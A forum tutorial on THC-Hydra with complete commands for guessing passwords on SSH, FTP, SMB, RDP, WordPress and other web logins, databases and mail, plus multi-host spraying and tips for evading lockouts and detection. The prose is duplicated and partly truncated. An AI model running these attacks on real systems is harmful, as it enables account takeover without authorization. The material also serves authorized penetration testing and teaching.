- Joined
- Dec 30, 2024
- Messages
- 388
- Reaction score
- 206
- Points
- 62
- Website
- blackhatpakistan.net
- Points
- 1,068
- USD
- 1,068
A Hydra brute force tutorial covers the online password attack workflow: THC-Hydra is the standard parallel login cracker that throws username-password combinations at running services - SSH, FTP, HTTP forms, SMB, RDP, databases - faster than any hand-rolled script, with a modular protocol engine that makes "add a target service" a flag change instead of a rewrite. This tutorial runs the real commands: service syntax, wordlist selection, the http-post-form attack against web logins, tuning threads so you do not lock the account, and the output format that drops straight into your engagement notes.
TL;DR - The shape of every Hydra run is the same: hydra -L users.txt -P pass.txt TARGET SERVICE plus service-specific options. Keep -t at 4 or lower for anything that locks accounts, always pass -f to stop at the first valid pair, and save everything with -o. SSH and FTP are one-flag services; web forms need the http-post-form path with the failure string that marks a bad login. Speed lives in GPU hashcat for offline hashes - Hydra is for services that answer you in real time.
INSTALL
Kali ships it:
From source:
CORE SYNTAX
The option letters matter more than anything else:
SSH - THE DAILY CASE
Against an engaged target: -t 4, -f, and a stop-on-first. Higher task counts on SSH just trigger fail2ban and burn the IP. If the username is known, drop -L for -l and Hydra skips the username loop entirely - measurably faster on rockyou-scale lists.
FTP AND SMB
FTP allows anonymous access? Skip Hydra and test it first - anonymous:anonymous sometimes answers before any wordlist work matters.
HTTP FORMS - THE ONE THAT NEEDS CARE
Generic form syntax:
Three parts, colon-separated:
- The POST path and body with ^USER^ and ^PASS^ placeholders
- F= - the string that appears on FAILED login (Hydra skips when it sees it)
- T= - the string that appears on SUCCESS (Hydra reports the hit)
Find the failure string by logging in manually with browser devtools: wrong password, copy the exact response text. Common variants: "Invalid credentials", "Login failed", "incorrect password".
Real-world example against a WordPress login:
The testcookie=1 and wp-submit fields matter - WordPress rejects incomplete POST bodies before it even checks credentials, and Hydra would report every pair as failed.
GET-parameter logins (less common):
DATABASES AND MIDDLEWARE
Only database ports exposed to you are in scope - internal-only services need a foothold first (the web tier from sqlmap, for example).
TUNING - DO NOT BURN THE ACCOUNT
Lockout math: if the service locks after 5 failed attempts, no Hydra tuning saves you - you need a credential pair first (spray one password per account instead of ten against one). Offline cracking with hashcat and rockyou belongs on captured hashes, not on live services.
TARGET LISTS AND BATCH RUNS
M-file format: one host per line (or host
ort for mixed ports). Keep -M runs small on shared infrastructure - a forty-host spray from one IP is a SOC ticket, not a pentest.
READING THE OUTPUT
-save it: -o hydra_results.txt writes a clean credential block for the report, and grep "login:" on verbose output extracts hits from long runs:
HYDRA VS HASHCAT VS MEDUSA
Hashcat on a captured NTLM or bcrypt hash out-cracks Hydra by orders of magnitude - Hydra exists for the moment when there is no hash, only a login prompt.
FAQ
Q: Why does Hydra show "all passwords done" but no hit when I know a password works?
A: Wrong failure/success strings in http-post-form, or the form needs extra fields (WordPress testcookie is the usual culprit). Capture one real failed login in devtools and copy its body exactly.
Q: Is Hydra legal?
A: Against systems you own or hold written authorization to test - yes, standard pentest tooling. The authorization defines the line, same as every other tool in this series.
Q: What -t value is safe?
A: 4 for SSH/RDP/anything with lockout policies, 16 acceptable on lab FTP or internal services without rate limits. When unsure, 4 plus -f.
Q: Hydra says protocol check failed?
A: The port is wrong for the module, TLS is in play (use ftps://, pop3s://, https:// variants), or the service banner is unusual - confirm with nmap -sV what is actually speaking on that port.
RELATED ON BLACKHAT PAKISTAN
Linux Privilege Escalation Checklist 2026 - creds in hand, now what the box gives back.
SQLMap Tutorial for Beginners 2026 - the other route to credentials: out of the database instead of through the login prompt.
Kali Linux Tools List 2026 - Hydra in the full password-attacks stack with john and hashcat.
Nmap Cheat Sheet 2026 - finding the 22/21/25/445 ports that are worth a Hydra run at all.
TL;DR - The shape of every Hydra run is the same: hydra -L users.txt -P pass.txt TARGET SERVICE plus service-specific options. Keep -t at 4 or lower for anything that locks accounts, always pass -f to stop at the first valid pair, and save everything with -o. SSH and FTP are one-flag services; web forms need the http-post-form path with the failure string that marks a bad login. Speed lives in GPU hashcat for offline hashes - Hydra is for services that answer you in real time.
INSTALL
Kali ships it:
Code:
sudo apt install hydra
hydra -h
From source:
Code:
git clone https://github.com/vanhauser-thc/thc-hydra.git
cd thc-hydra && ./configure && make -j4
CORE SYNTAX
Code:
hydra -L users.txt -P pass.txt ssh://10.10.10.5 list x list, SSH
hydra -l admin -P pass.txt ftp://10.10.10.5 single user, FTP
hydra -C creds.txt ssh://10.10.10.5 user:pass combos file
hydra -l root -p admin123 TARGET one pair, any service
The option letters matter more than anything else:
Code:
-l USER single username -L FILE username list
-p PASS single password -P FILE password list
-C FILE creds as user:pass per line (fastest when pairs are known)
-f stop at first success (per target)
-F stop when ANY pair works (whole run)
-t 4 tasks per target (default 16 - too loud for most services)
-vV verbose, shows every attempt pair
-o FILE write found creds to file
-M FILE targets from file, one per line
SSH - THE DAILY CASE
Code:
hydra -L users.txt -P /usr/share/wordlists/rockyou.txt -t 4 -f -o hydra_ssh.out ssh://10.10.10.5
Against an engaged target: -t 4, -f, and a stop-on-first. Higher task counts on SSH just trigger fail2ban and burn the IP. If the username is known, drop -L for -l and Hydra skips the username loop entirely - measurably faster on rockyou-scale lists.
FTP AND SMB
Code:
hydra -L users.txt -P pass.txt -t 4 -f ftp://10.10.10.5
hydra -L users.txt -P pass.txt smb://10.10.10.5 SMBv1/2 login test
hydra -l administrator -P pass.txt rdp://10.10.10.5 RDP, keep -t low
FTP allows anonymous access? Skip Hydra and test it first - anonymous:anonymous sometimes answers before any wordlist work matters.
HTTP FORMS - THE ONE THAT NEEDS CARE
Generic form syntax:
Code:
hydra -L users.txt -P pass.txt TARGET http-post-form "/login.php:username=^USER^&password=^PASS^:F=Invalid password:T=Welcome"
Three parts, colon-separated:
- The POST path and body with ^USER^ and ^PASS^ placeholders
- F= - the string that appears on FAILED login (Hydra skips when it sees it)
- T= - the string that appears on SUCCESS (Hydra reports the hit)
Find the failure string by logging in manually with browser devtools: wrong password, copy the exact response text. Common variants: "Invalid credentials", "Login failed", "incorrect password".
Real-world example against a WordPress login:
Code:
hydra -L users.txt -P pass.txt TARGET http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=is incorrect:T=wordpress_logged_in"
The testcookie=1 and wp-submit fields matter - WordPress rejects incomplete POST bodies before it even checks credentials, and Hydra would report every pair as failed.
GET-parameter logins (less common):
Code:
hydra -l admin -p pass.txt TARGET http-get "/admin.php?user=^USER^&pass=^PASS^:F=denied:T=panel"
DATABASES AND MIDDLEWARE
Code:
hydra -l root -P pass.txt mysql://10.10.10.5 MySQL
hydra -l sa -P pass.txt mssql://10.10.10.5 MSSQL
hydra -l postgres -P pass.txt postgres://10.10.10.5 PostgreSQL
hydra -l admin -P pass.txt telnet://10.10.10.5 telnet, legacy gear
hydra -L users.txt -P pass.txt pop3s://mail.target.com mail, SSL variant works too
Only database ports exposed to you are in scope - internal-only services need a foothold first (the web tier from sqlmap, for example).
TUNING - DO NOT BURN THE ACCOUNT
Code:
hydra ... -t 4 4 parallel tasks, the polite default
hydra ... -w 5 5 second wait between attempts (slowest, safest)
hydra ... -f stop at first hit per target
hydra ... -x 6:6:1 generate passwords: 6 length min=max, 1 charset (aA1)
hydra -I ignore nmap-style restore, fresh run
hydra ... -V show every attempt, pair-level log
Lockout math: if the service locks after 5 failed attempts, no Hydra tuning saves you - you need a credential pair first (spray one password per account instead of ten against one). Offline cracking with hashcat and rockyou belongs on captured hashes, not on live services.
TARGET LISTS AND BATCH RUNS
Code:
hydra -L users.txt -P pass.txt -M hosts.txt -t 4 -f ssh many hosts, one run
hydra -C combo.txt -M hosts.txt -t 4 smb known pairs, many hosts
M-file format: one host per line (or host
READING THE OUTPUT
Code:
[22][ssh] host: 10.10.10.5 login: root password: admin123
1 of 1 target successfully completed, 1 valid password found
-save it: -o hydra_results.txt writes a clean credential block for the report, and grep "login:" on verbose output extracts hits from long runs:
Code:
grep "login:" hydra_out.txt | tee found_creds.txt
HYDRA VS HASHCAT VS MEDUSA
Code:
Tool Speed model Use when
----- ----------------------- ------------------------------------
Hydra live service, network the service answers logins in real time
Medusa parallel modules, cleaner log large host lists, module variety
Hashcat GPU, offline, millions/s you already have the hash
Hashcat on a captured NTLM or bcrypt hash out-cracks Hydra by orders of magnitude - Hydra exists for the moment when there is no hash, only a login prompt.
FAQ
Q: Why does Hydra show "all passwords done" but no hit when I know a password works?
A: Wrong failure/success strings in http-post-form, or the form needs extra fields (WordPress testcookie is the usual culprit). Capture one real failed login in devtools and copy its body exactly.
Q: Is Hydra legal?
A: Against systems you own or hold written authorization to test - yes, standard pentest tooling. The authorization defines the line, same as every other tool in this series.
Q: What -t value is safe?
A: 4 for SSH/RDP/anything with lockout policies, 16 acceptable on lab FTP or internal services without rate limits. When unsure, 4 plus -f.
Q: Hydra says protocol check failed?
A: The port is wrong for the module, TLS is in play (use ftps://, pop3s://, https:// variants), or the service banner is unusual - confirm with nmap -sV what is actually speaking on that port.
RELATED ON BLACKHAT PAKISTAN
Linux Privilege Escalation Checklist 2026 - creds in hand, now what the box gives back.
SQLMap Tutorial for Beginners 2026 - the other route to credentials: out of the database instead of through the login prompt.
Kali Linux Tools List 2026 - Hydra in the full password-attacks stack with john and hashcat.
Nmap Cheat Sheet 2026 - finding the 22/21/25/445 ports that are worth a Hydra run at all.
Code:
hydra -L u.txt -P p.txt -t 4 -f ssh://HOST SSH
hydra -L u.txt -P p.txt -t 4 -f ftp://HOST FTP
hydra -l admin -P p.txt http-post-form "/login:u=^USER^&p=^PASS^:F=fail:T=ok" web form
hydra -C combo.txt -M hosts.txt -t 4 smb known pairs, many hosts
hydra -l root -p pass mysql://HOST database
hydra -o out.txt ... always save output
grep "login:" out.txt extract hits for report